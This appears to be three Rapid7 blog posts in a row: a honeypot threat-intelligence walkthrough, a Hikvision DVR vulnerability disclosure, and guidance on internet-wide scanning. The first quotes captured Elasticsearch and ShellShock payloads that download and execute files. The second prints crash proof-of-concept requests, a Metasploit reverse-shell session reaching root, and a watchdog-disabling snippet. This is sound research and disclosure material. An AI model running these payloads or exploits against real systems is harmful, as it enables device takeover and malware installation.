Rapid7 Blog




12 Days of HaXmas: Beginner Threat Intelligence with Honeypots


This post is the 12th in the series, "12 Days of HaXmas." So the Christmas season is here, and between ordering gifts and drinking Glühwein, what better way to spend your time than to sieve through some honeypot / firewall / IDS logs and try to make sense of them, right? At Rapid7 Labs, we're not only scanning the internet but also looking at who out there is scanning, by making use of honeypot and darknet tools. More precisely, we're running a couple of honeypots spread around the world and collecting raw traffic as PCAP files with something similar to tcpdump (just slightly more clever). This post is a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here happens in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually.

Some background

The honeypot is fairly simple: it waits for incoming connections and then tries to figure out what to do with them. It might need to treat a connection as SSL/TLS, or as a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way.
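As a rough illustration of that protocol detection (a hypothetical sketch, not the actual honeypot code): peek at the first bytes of a new connection and decide whether to answer as TLS or as plain HTTP.

```python
def guess_protocol(first_bytes):
    """Guess what to speak on a new connection from its first bytes."""
    # A TLS ClientHello arrives in a record whose first byte is 0x16
    # (the "handshake" content type).
    if first_bytes[:1] == b"\x16":
        return "tls"
    # Plain HTTP starts with an ASCII method token.
    method = first_bytes.split(b" ", 1)[0]
    if method in (b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS"):
        return "http"
    return "unknown"
```

A real honeypot would then hand the socket to an SSL/TLS wrapper or an HTTP parser accordingly.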
Even with a very basic honeypot that just opens a port and waits for requests, you will quickly find things like this:

    GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1
    Host: redacted:9200
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server

or this:

    GET HTTP/1.1 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget ; curl -O ; fetch ; lwp-download; chmod +x .c.txt* ; sh .c.txt* ");'
    Host: redacted
    Connection: Close

What we're looking at are ElasticSearch (slightly modified, as the path was URL-decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward - there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups around these exploitation attempts and the botnets behind them on the web (e.g. [1], [2], [3]). Because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc. command), it will then try to download that file.
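The extraction step can be approximated with two regular expressions. The patterns below are a simplified stand-in for what the honeypot does, not its actual code:

```python
import re

# Full URLs anywhere in the request, plus whole download commands
# (wget/curl/fetch/lwp-download) up to the next shell separator.
URL_RE = re.compile(r"https?://[^\s'\"();]+")
CMD_RE = re.compile(r"\b(?:wget|curl|fetch|lwp-download)\b[^;&|]*")

def extract_indicators(request_text):
    """Return (urls, download_commands) found in a raw request."""
    return URL_RE.findall(request_text), CMD_RE.findall(request_text)
```

Anything the URL pattern yields can then be fetched immediately and stored by hash.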
We could also do this at the post-processing stage, but by then the URL might not be available any more, as these things tend to disappear or get taken down quickly. Looking at the unique files from (roughly) the last half year, we can count the following file types (reduced/combined for readability):

    178  ELF 32-bit LSB executable, Intel 80386
     66  a /usr/bin/perl script, ASCII text executable
     33  Bourne-Again shell script, ASCII text executable
     14  POSIX tar archive (GNU)
     14  ELF 64-bit LSB executable, x86-64
      4  ELF 32-bit LSB executable, MIPS
      2  ELF 32-bit LSB executable, ARM
      1  ELF 32-bit MSB executable, PowerPC or cisco 4500
      1  ELF 32-bit MSB executable, MIPS
      1  OpenSSH DSA public key

Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see, there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targeting of quite a few different architectures. These are mostly binaries for embedded routers and, for example, the QNAP devices that are vulnerable to ShellShock.

Getting started on the logs

What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection", "I found a URL in a request" and "I downloaded a file from a URL".
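Tallying such `file`-style descriptions is a one-liner with collections.Counter; the sample descriptions below are made up for illustration:

```python
from collections import Counter

# Hypothetical: one file(1)-style description per unique downloaded sample.
filetypes = [
    "ELF 32-bit LSB executable Intel 80386",
    "ELF 32-bit LSB executable Intel 80386",
    "Bourne-Again shell script ASCII text executable",
    "OpenSSH DSA public key",
]

def tally(descriptions):
    """Count identical descriptions, most common first."""
    return Counter(descriptions).most_common()
```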
The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP). Again, modified for better readability:

    $ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json

    {
      "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998",
      "utcts": "2015-12-13T07:36:59.444356Z",
      "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9",
      "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc",
      "url.netloc": "ys-k.ys168.com",
      "source": "",
      "source.country_code": "CN",
      "sensor": "redacted",
      "sensor.country_code": "JP",
      "dport": 9200,
      "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
      "http.method": "POST",
      "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD"
    }
    ...

Now we can take these logs and do some correlation, creating one record per "attack". We also add a couple more data sources (ASN lookup, file types for the downloaded files, etc.). For the sake of this post, let's focus on the attacks which led to downloadable files and that we could categorize as ShellShock / ElasticSearch exploits.
By writing a quick formatting script that does some counting of fields, we get something pretty like this (using python prettytable; condensed here, full version):

    key:     CN / AS 4134
    count:   89   (first: 2015-08-05, last: 2015-08-08)
    sensors: 54x US, 14x JP, 10x AU, 5x IE, 3x SG, 3x BR
    dport:   89x 9200    method: 89x GET
    vulns:   89x VULN-ELASTICSEARCH-RCE, CVE-2014-3120, EXEC-SHELLCMD
    sha1:    88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e
              1x b6bb2b7cad3790887912b6a8d2203bebedb84427
    url:     84x, 4x, 1x

    key:     CN / AS23650
    count:   87   (first: 2015-05-06, last: 2015-05-27)
    sensors: 55x US, 15x SG, 11x AU, 4x JP, 2x IE
    dport:   87x 9200    method: 87x GET
    vulns:   87x VULN-ELASTICSEARCH-RCE, CVE-2014-3120, EXEC-SHELLCMD
    sha1:    87x f7b229a46b817776d9d2c1052a4ece2cb8970382
    url:     72x, 15x

    key:     CN / AS 9808
    count:   63   (first: 2015-10-26, last: 2015-10-27)
    sensors: 21x IE, 11x US, 9x JP, 8x AU, 8x SG, 6x BR
    dport:   63x 9200    method: 63x POST
    vulns:   63x VULN-ELASTICSEARCH-RCE, CVE-2014-3120, EXEC-SHELLCMD
    sha1:    48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9
             15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e
    url:     18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm
             15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc
             15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip
              9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto
              5x
              1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt

    key:     MX / AS 8151
    count:   50   (first: 2015-11-05, last: 2015-12-02)
    sensors: 23x US, 22x AU, 5x BR
    dport:   50x 80      method: 50x GET
    vulns:   50x VULN-SHELLSHOCK, CVE-2014-6271
    sha1:    37x 21762efb4df7cbb6b2331b34907817499f53be99
              4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e
              4x 3a33f909c486406773b06d8da3b57f530dd80de6
              3x ebbe8ebb33e78348a024f8afce04ace6b48cc708
              2x 3caf6f7c6f4953b9bbba583dce738481da338ea7
    url:     37x, 4x, 4x, 3x, 2x
    ...

With my test dataset of roughly 2000 "attacks with downloads", this leads to 195 unique sources that make use of several drop URLs and payloads over the course of a couple of months.

Basic Threat Intelligence

Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use.
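A sketch of such a counting script (field names follow the log record shown earlier; the aggregation logic is my own simplification, not the actual backend code):

```python
from collections import Counter, defaultdict

def summarize(attacks):
    """Group attack records by source and tally interesting fields."""
    groups = defaultdict(lambda: {"count": 0, "dport": Counter(),
                                  "sha1": Counter(), "first": None, "last": None})
    for a in attacks:
        g = groups[a["source"]]
        g["count"] += 1
        g["dport"][a["dport"]] += 1
        g["sha1"][a["sha1"]] += 1
        ts = a["utcts"]
        # ISO-8601 timestamps sort lexicographically, so min/max work directly
        g["first"] = ts if g["first"] is None else min(g["first"], ts)
        g["last"] = ts if g["last"] is None else max(g["last"], ts)
    return dict(groups)
```

Feeding each group's counters into prettytable then produces rows like the ones above.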
In addition, there are also more in-depth methods, like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further. The problem is that doing this grouping manually is painful, as it's not enough to go one level deep. A source that uses a couple of binaries which are also used by another source is just the first layer. But those sources already had their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points - an attacker IP, a file hash, a drop host IP/name, etc. - can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories. If you create a graph for our honeypot data set, it looks like this:

[figure: graph of the honeypot data set - sources, payloads and drop hosts as nodes]

So to categorize our incidents into attacker groups, we build up these subgraphs by writing a graph traversal function. We correlate attackers based on the binaries used, the hosts used for downloading payloads, and the hosts contacted by the malware samples themselves (sadly I didn't get to do this for all of them).
    import collections
    import json

    GRAPH = collections.defaultdict(set)

    def add_edge(fr, to):
        # undirected
        GRAPH[fr].add(to)
        GRAPH[to].add(fr)

    def graph_traversal(src):
        visited = set([src])
        queue = [src]
        while queue:
            parent = queue.pop(0)
            children = GRAPH[parent]
            for child in children:
                if child not in visited:
                    yield parent, child
                    visited.add(child)
                    queue.append(child)

    for e in DATA:
        src = ("source", e["source"])
        payload = ("payload", e["sha1"])
        payloadsrc = ("payloadsrc", e["url.netloc"])
        add_edge(src, payload)
        add_edge(payload, payloadsrc)
        for i in e.get("mal.tcplist", []):
            add_edge(payload, ("c2", i))

    n = 1
    seen = set()
    for src in set(e["source"] for e in DATA):
        if src in seen:
            continue
        members = set()
        indicators = set()
        for (ta, va), (tb, vb) in graph_traversal(("source", src)):
            if ta == "source":
                members.add(va)
            else:
                indicators.add((ta, va))
            if tb == "source":
                members.add(vb)
            else:
                indicators.add((tb, vb))
        print(json.dumps(dict(members=list(members),
                              indicators=list(indicators), group=n)))
        n += 1
        seen |= members

This leads to 81 groups, as shown by the next table (condensed here, full version):

    group:   3
    count:   224  (first: 2015-04-09, last: 2015-12-13)
    sources: 144x, 31x, 14x, 14x, 8x, 7x, 5x, 1x
    source country: 210x CN, 14x KR
    source ASN: 144x AS37963, 66x AS23650, 14x AS 4766
    sensors: 84x US, 44x IE, 26x JP, 26x SG, 23x AU, 21x BR
    dport:   224x 9200   method: 158x POST, 66x GET
    vulns:   224x VULN-ELASTICSEARCH-RCE, CVE-2014-3120, EXEC-SHELLCMD
    sha1:    143x 4db1c73a4a33696da9208cc220f8262fb90767af
              81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9
    url:     65x, 53x, 28x, 16x, 13x, 7x, 7x, 7x, 6x, 5x, 4x, 4x, 3x, 3x, 3x

    group:   12
    count:   23   (first: 2015-11-17, last: 2015-12-13)
    sources: 9x, 4x, 4x, 2x, 1x, 1x, 1x, 1x
    source country: 19x US, 2x TR, 1x CA, 1x DE
    source ASN: 9x AS36352, 4x AS55286, 4x AS 8100, 2x AS43391, 1x AS30083, 1x AS32613, 1x AS24940, 1x AS33387
    sensors: 18x US, 3x AU, 1x JP, 1x BR
    dport:   15x 80, 8x 9200   method: 15x GET, 8x POST
    vulns:   15x VULN-SHELLSHOCK, CVE-2014-6271; 8x VULN-ELASTICSEARCH-RCE, CVE-2014-3120, EXEC-SHELLCMD
    sha1:    8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf
             8x c30026c548cd45be89c4fb01aa6df6fd733de964
             5x fe01a972a63f754fed0322698e16b2edc933f422
             2x 05f32da77a9c70f429c35828d73d68696ca844f2
    url:     8x, 2x, 2x, 2x, 2x, 1x, 1x, 1x, 1x, 1x, 1x, 1x

    group:   13
    count:   42   (first: 2015-04-23, last: 2015-04-27)
    sources: 22x, 20x
    source country: 22x US, 20x NL
    source ASN: 22x AS27176, 20x AS58073
    sensors: 14x US, 10x IE, 8x SG, 7x BR, 3x AU
    dport:   21x 10000, 18x 7778, 3x 8080   method: 42x GET
    vulns:   42x VULN-QNAP-SHELLSHOCK
    sha1:    12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853
             12x 3e4e34a51b157e5365caa904cbddc619146ae65c
              7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1
              7x 9851bcec479204f47a3642177c75a16b58d44c20
              3x 1a412791a58dca7fc87284e208365d36d19fd864
              1x d538717c89943f42716c139426c031a21b83c236
    url:     20x, 12x, 7x, 3x

What else?

As mentioned before, this can be done in much more detail, by analyzing the samples further and extracting better/more indicators than just the contacted C2 hosts. There is probably also more data around the hosts / domains used for the drop sites (payload URLs) that could potentially be used to correlate different sets. If we take some of the hosts/IPs from above and use them to query Project Sonar, we get DNS records, open ports and certificate information:

    address had port 80/tcp open
    address was seen in DNS A record for 58559.url.dnspud.com
    address was seen in DNS A record for cc365cc-com-2015-7.com
    saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint
    address was seen in DNS A record for www.investorfinder.de
    address was seen in DNS A record for teafortwohearts.com
    address had port 80/tcp open
    address had port 993/tcp open
    address was seen in DNS A record for peoplesblueprint.ca
    address had DNS PTR record hn.kd.ny.adsl
    address was seen in DNS A record for jilijia.net
    address was seen in DNS A record for cxyt.org
    elbinvestment.com had a DNS A record with value address
    address was seen in DNS A record for www.lerhe.com
    saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint
    ys-f.ys168.com had a DNS A record pointing to IP
    address had port 995/tcp open
    address had port 465/tcp open
    address was seen in DNS A record for school88le.com
    ...
Following this data, or adding it into the graph, can yield some interesting results - but it's also of lower "quality": most of the infrastructure used by the attackers probably consists of compromised systems that have lots of other uses, so there's a lot of noise around the attacker's activity.

Summing up

Looking through these datasets can be fun, but also a bit tricky at times. Command-line kung fu and some scripting can help pivot around a dataset if you don't want to put in the effort of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often match the graph data model well, and thus we can make use of simple graph traversal functions or even a real graph database to analyze our data. In order to analyze most of the samples, I implemented Linux support in Cuckoo Sandbox. It is available in the current development branch - follow us closely for the release of the next version! Another noteworthy point is that honeypots can still yield some fun (though not always interesting) data nowadays. With internet scanning becoming more popular and easier to do, a few low-skill shotgun-type attackers are joining the game and trying to get quick wins by running mass exploitation runs. Rapid7 Labs is always interested in similar stories if you are willing to share them, so let us know what you think in the comments! Also feel free to tweet me personally @repmovsb.

Happy HaXmas!

-Mark

References:
[1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog
[2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ
[3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"

R7-2014-18: Hikvision DVR Devices - Multiple Vulnerabilities


Rapid7 Labs has found multiple vulnerabilities in Hikvision DVR (Digital Video Recorder) devices such as the DS-7204 and other models in the same product series that allow a remote attacker to gain full control of the device. More specifically, three typical buffer overflow vulnerabilities were discovered in Hikvision's RTSP request handling code: CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880. This blog post serves as disclosure of the technical details for those vulnerabilities. In addition, a remote code execution exploit has been published as a Metasploit module.

Vulnerability Summary

After starting Project Sonar in 2013, Rapid7 Labs began investigating several protocols, services and devices that are popular on the internet, in order to find and raise awareness about widespread misconfigurations and vulnerabilities. One category of these devices is the so-called "Digital Video Recorder" (sometimes "Network Video Recorder"). Typically these are used to record surveillance footage of office buildings and surrounding areas, or even private properties. Sieving through our Sonar datasets, we found several vendors and families of these devices, but the Hikvision models in particular are very popular and widespread across the public IPv4 address space, with around 150,000 devices remotely accessible. Speculating about reasons for this popularity, one could argue that the iPhone app that can view the surveillance streams remotely is very appealing to a lot of customers. Apart from the fact that these devices come with a default administrative account "admin" with password "12345", they also contain several quickly found vulnerabilities that ultimately lead to full remote compromise.
During our initial analysis we found three different buffer overflow vulnerabilities in the RTSP request handler:

- [CVE-2014-4878] Execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request body handling
- [CVE-2014-4879] Execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request header handling
- [CVE-2014-4880] Execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP basic authentication handling

CVE-2014-4878 - Buffer Overflow in the RTSP Request Body Handling

The RTSP request handler uses a fixed-size buffer of 2048 bytes for consuming the HTTP request body, which leads to a buffer overflow condition when sending a larger body. This can most likely be exploited for code execution; however, we just present a denial-of-service proof here:

    request  = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
    request += "CSeq: 7\r\n"
    request += "Authorization: Basic AAAAAAA\r\n"
    request += "Content-length: 3200\r\n\r\n"
    request += "A" * 3200

CVE-2014-4879 - Buffer Overflow in the RTSP Request Header Handling

The RTSP request handler uses fixed-size buffers when parsing the HTTP headers, which leads to a buffer overflow condition when sending a large header key. This can most likely be exploited for code execution; however, we just present a denial-of-service proof here:

    request  = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
    request += "Authorization"
    request += "A" * 1024
    request += ": Basic AAAAAAA\r\n\r\n"

CVE-2014-4880 - Buffer Overflow in the RTSP Basic Authentication Handling

The Metasploit module written for this vulnerability sends a crafted RTSP request that triggers a buffer overflow condition when handling the "Basic Auth" header of an RTSP transaction.
Due to this condition, the request takes control of the remote instruction pointer and diverts execution to a series of ROP gadgets that pivot the stack to an area within the request packet itself, in order to continue execution there. The code placed in this area in the case below is a standard reverse shellcode generated by Metasploit.

    ./msfcli exploit/linux/misc/hikvision_rtsp_bof payload=linux/armle/shell_reverse_tcp RHOST= LHOST= SHELL=/bin/sh SHELLARG=sh E
    [*] Initializing modules...
    payload => linux/armle/shell_reverse_tcp
    RHOST =>
    LHOST =>
    SHELL => /bin/sh
    SHELLARG => sh
    [*] Started reverse handler on
    [*] Command shell session 1 opened ( -> ) at 2014-09-15 18:09:03 +0200

    id
    uid=0(root) gid=0(root)

No authentication is required to exploit this vulnerability, and the Metasploit module successfully demonstrates gaining full control of the remote device.

Hikvision Reboot Watchdog - Post Exploitation

The firmware implements watchdog functionality in the form of a kernel module which can be contacted through the /dev/watchdog device node. The main binary opens this node and writes one byte to it every two seconds. If that behavior stops, the kernel module reboots the device. To stop this, one can disable the watchdog functionality after getting into the system, with the following ioctl:

    int one = 1;
    int fd = open("/dev/watchdog", 2);
    int ret = ioctl(fd, 0x80045704, &one);

After running this on the device, either as part of the shellcode or as a post-exploitation stage, the watchdog does not reboot the device anymore.

Vendor Analysis, Solutions and Workarounds

The device under test was a Hikvision DS-7204-HVI-SV digital video recorder with firmware V2.2.10 build 131009 (Oct 2013). Other devices in the same model range are affected too; however, we do not have an exhaustive list of affected firmware versions and models.
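For completeness, the denial-of-service proof for CVE-2014-4878 shown earlier is plain string building, so it can be packaged and sent with a few lines of Python. This is a hypothetical harness (RTSP's default port 554 is assumed), and should of course only be run against devices you are authorized to test:

```python
import socket

def build_body_overflow(host, size=3200):
    """Assemble the CVE-2014-4878 DoS request from the advisory."""
    request  = "PLAY rtsp://%s/ RTSP/1.0\r\n" % host
    request += "CSeq: 7\r\n"
    request += "Authorization: Basic AAAAAAA\r\n"
    request += "Content-length: %d\r\n\r\n" % size
    request += "A" * size  # overflows the 2048-byte body buffer
    return request

def send_poc(host, port=554):
    # 554 is the RTSP default port; adjust for the target's configuration
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(build_body_overflow(host).encode())
```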
Prior to this research, CVE-2013-4977 was discovered by Anibal Sacco and Federico Muttis from the Core Exploit Writers Team, affecting multiple Hikvision devices. We confirmed that the device under test for this advisory is still vulnerable to their attack. Given the presence of this prior vulnerability in the analyzed DVR device, we believe it is likely that all products offering identical features are affected by these issues.

Hikvision provided no response to these issues after several attempts to contact them. In order to mitigate these exposures until a patch is released, Hikvision DVR devices and similar products should not be exposed to the internet without the usual additional protective measures, such as an authenticated proxy, VPN-only access, et cetera.

Sidenote on previous compromise of DVRs by Malware

Earlier this year, researchers from SANS found a botnet consisting mostly of DVR devices and routers which does bitcoin mining as one of its main purposes. This botnet used default credentials to compromise the devices, and while we don't have any statistics on the number of infected devices, we assume that a relatively high percentage of devices still have the default password configured. However, more widespread exploitation possibilities, not only on DVRs but also on other embedded devices, could lead to a larger botnet that subsequently poses a larger threat to the rest of the internet.

Vulnerability Disclosure Timeline and Researcher Credit

CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880 were discovered and researched by Mark Schloesser from Rapid7 Labs.

Disclosure Timeline:

- Sep 15, 2014: Vendor contacted
- Oct 06, 2014: Disclosure to CERT/CC
- Oct 09, 2014: CVE identifiers assigned
- Nov 19, 2014: Public disclosure
- Nov 19, 2014: Metasploit module for CVE-2014-4880 published as PR 4235
- Nov 19, 2014: Nexpose coverage for CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880 added

Scanning All The Things


Introduction

Over the past year, the Rapid7 Labs team has conducted large-scale analysis of the data coming out of the Critical.IO and Internet Census 2012 scanning projects. This revealed a number of widespread security issues and painted a gloomy picture of an internet rife with insecurity. The problem is, this isn't news, and the situation continues to get worse. Rapid7 Labs believes the only way to make meaningful progress is through data sharing and collaboration across the security community as a whole. As a result, we launched Project Sonar at DerbyCon 3.0 and urged the community to get involved with the research and analysis effort. To make this easier, we highlighted various free tools and shared a huge amount of our own research data for analysis.

Below is a quick introduction to why internet-wide scanning is important, its history and goals, and a discussion of the feasibility and present best practices for those who want to join the party.

Gain visibility and insight

A few years ago, internet-wide surveys were still deemed unfeasible, or at least too expensive to be worth the effort. There have been only a few projects that mapped out aspects of the internet - for example, the IPv4 Census published by the University of Southern California in 2006. That project sent ICMP echo requests to all IPv4 addresses between 2003 and 2006 to collect statistics and trends about IP allocation. A more recent example of such research is the Internet Census 2012, which was accomplished through illegal means by the "Carna Botnet," which consisted of over 420,000 infected systems. The EFF SSL Observatory investigated "publicly-visible SSL certificates on the Internet in order to search for vulnerabilities, document the practices of Certificate Authorities, and aid researchers interested in the web's encryption infrastructure".
Another case of widespread vulnerabilities, in serial port servers, was published by HD Moore based on data from the Critical.IO internet scanning project. The EFF Observatory, and even the botnet-powered Internet Census data, helps people understand trends and allows researchers to prioritize research based on the actual usage of devices and software. Raising awareness about widespread vulnerabilities through large-scale scanning efforts yields better insight into the service landscape on the internet, and hopefully allows both the community and companies to mitigate risks more efficiently.

We believe that scanning efforts will be undertaken by more people in the future, and we consider them valuable to both researchers and companies. Research about problems and bugs raises awareness, and companies gain visibility into their assets. Even though probing/scanning/data collection can be beneficial, there are dangers to it, and it should always be conducted with care and using best practices. We provide more information on that below - and we will share all our data with the community to reduce data duplication and bandwidth usage among similar efforts.

Feasibility and costs

As mentioned, this kind of research was once considered very costly or even unfeasible. The Census projects either ran over a long time (2 months) or used thousands of devices. With the availability of better hardware and clever software, internet-wide scanning has become much easier and cheaper in recent years. The ZMap open source network scanner was built for this purpose and allows a GbE-connected server to reach the entire internet - all IPv4 addresses - within 45 minutes. It achieves this by generating over a million packets per second when configured to use the full bandwidth. Of course, this requires the hardware to be able to reach that throughput in packet generation and response processing.
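The arithmetic behind those numbers is simple. The figures below assume one minimal-size SYN frame per IPv4 address (a back-of-the-envelope sketch, not a benchmark):

```python
# Full IPv4 space; skipping reserved/unrouted ranges shaves roughly 14% off.
ADDRESSES = 2**32

def scan_hours(packets_per_second):
    """Time to send one probe to every IPv4 address at a given rate."""
    return ADDRESSES / packets_per_second / 3600.0

# A minimal TCP SYN occupies about 84 bytes on the wire including framing,
# so a saturated GbE link tops out near 1.4-1.5M packets per second --
# which is what puts a full sweep inside the hour, while a gentler
# 500k pps works out to roughly 2.4 hours.
```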
Other projects go even further - Masscan generates 25 million packets per second using dual 10GbE links and thus could reach the entire address space in 3 minutes. So, technically, one can do internet-wide scans with a single machine - if the hardware is good enough. Of course, this is not the only requirement - a couple of others are needed as well:

- The network equipment at the data center needs to be able to cope with the packet rates
- The hosting company or ISP needs to allow this kind of activity on their network (terms of service)
- As "port scanning" is considered an "attack" by a large number of IDSs and operators, this activity will generate a lot of abuse complaints to the hoster/ISP and to you. Thus one needs to notify the hoster beforehand and agree on boundaries, packet rates, bandwidth limits and their view on abuse complaints.

Especially the network equipment and the abuse handling process are things that are difficult to assess beforehand. We went through a couple of options before we were able to establish a good communication channel with our hosters and were allowed to conduct this kind of project using their resources. We saw network equipment failing at packet rates over 100k/sec, high packet loss in other equipment at rates over 500k/sec, and had hosters locking our accounts even after we had notified them about the process beforehand.

Settings and resource recommendations

We decided that for most scans it is actually not that important to bring the duration below a few hours.
Of course, one might not get a real "snapshot" of the internet's state if the duration is longer - but in our opinion the trade-off regarding error rates, packet loss and impact on remote networks outweighs the higher speed by far.

- Always coordinate with the hosting company / ISP - make sure they monitor their equipment health and throughput, and have them define limits for you
- Don't scan unrouted (special) ranges within the IPv4 address space - the ZMap project compiled a list of these (also to be found on Wikipedia)
- Benchmark your equipment before doing full scans - we list some recommendations below, but testing is key
- Don't exceed 500k packets per second on one machine - this rate worked on most of the dedicated servers we tested and keeps scan time around 2 hours (still needs coordination with the hoster)
- Distribute work across multiple source IPs and multiple source hosts - this reduces abuse complaints and allows you to use lower packet rates to achieve the same scan duration (lower error rate)
- When virtual machines are used, keep in mind I/O delays due to the virtualization layer - use lower packet rates (< 100k/sec) and coordinate with the hoster beforehand
- If possible, randomize the target order to reduce load on individual networks (ZMap provides this feature in a clever way)

Best practices

If one plans to do internet-wide scanning, maybe the most important aspect is to employ best practices and not interfere with the availability of other people's resources.
The ZMap project put together a good list of these, and we summarize it here for the sake of completeness:

- Coordinate not only with the hosting company but also with abuse reporters and other network maintainers.
- Review any applicable laws in your country/state regarding scanning activity; possibly coordinate with law enforcement.
- Provide a possible opt-out for companies / network maintainers and exclude them from further scanning after a request.
- Explain the scanning purpose and project goals clearly on a website (or similar) and refer involved people to it.
- Reduce packet rates and scan frequencies as much as your research goal allows, to reduce load and impact on networks and people.

Implementation details

After covering the theoretical background and discussing goals and best practices, we want to mention a few of our implementation choices.

For port scanning we make use of the aforementioned excellent ZMap software. The authors did a great job on the project, and the clever IP randomization based on iterating over a cyclic group reduces load and impact on networks while still keeping very little state. Although ZMap provides almost everything needed, we use it only as a SYN scanner and do not implement probing modules within ZMap. The reachable hosts / ports are collected from ZMap and then processed on other systems using custom clients or possibly even Nmap NSE scripts, depending on the scan goal.

As an example, for downloading SSL/TLS certificates from HTTPS webservers, we do a 443/TCP ZMap scan and feed the output to a couple of other systems that immediately connect to those ports and download the certificates. This choice allowed us to implement simple custom code that is able to handle SSLv2 and the latest TLS at the same time. As we see slightly below 1% of the Internet having port 443 open, we have to handle around 5000 TCP connections per second when using ZMap at 500k packets per second.
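The cyclic-group randomization mentioned above can be sketched in a few lines. This is a simplified illustration, not ZMap's actual implementation: the prime and generator below are assumptions chosen for demonstration (4294967311 is a prime just above 2^32; the generator is not guaranteed to be a primitive root, whereas ZMap picks one whose order covers the whole group):

```python
# Sketch of ZMap-style address randomization: iterate the multiplicative
# group of integers modulo a prime P > 2^32. Repeatedly multiplying by a
# fixed generator visits distinct group elements in a scattered order
# while keeping only O(1) state (the current element).
P = 4_294_967_311   # a prime just above 2^32 (assumption for illustration)
GENERATOR = 3       # illustrative; real implementations verify its order

def randomized_ips(seed=0xDEADBEEF):
    """Yield IPv4 addresses (as integers) in a pseudo-random order."""
    x = seed % P
    for _ in range(P - 1):
        x = (x * GENERATOR) % P
        if x < 2**32:          # skip the few group elements above the IPv4 space
            yield x

it = randomized_ips()
sample = [next(it) for _ in range(3)]
print(sample)   # three scattered 32-bit values
```

Because the only state is the current element, a scan built this way can be paused and resumed cheaply, and no per-address "already visited" bookkeeping is needed.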
These 5000 TCP connections per second are distributed across a few systems to reduce error rates.

Another example is our DNS lookup job. When looking up massive amounts of DNS records (for example, all common names found in the certificates), we use a relatively high number of virtual machines across the world to reduce the load on the DNS resolvers. In the implementation we use the excellent c-ares library from the cURL project. You can find our mass DNS resolver using c-ares in Python here.

Conclusion

In our opinion, visibility into publicly available services and software is severely lacking. Research like the EFF SSL Observatory leads to better knowledge about problems and allows us to improve the security of the Internet overall. Datasets from efforts such as the Internet Census 2012, even though obtained through illegal means, provide fertile ground for researchers to find vulnerabilities and misconfigurations. If we were able to obtain datasets like this on a regular basis through legal means and without noticeable impact on equipment, it would allow the security community to research trends, statistics and problems of our current public Internet.

Companies can also use these kinds of datasets to gain visibility into their assets and public-facing services. They can reduce the risk of misconfiguration and learn about common problems with devices and software.

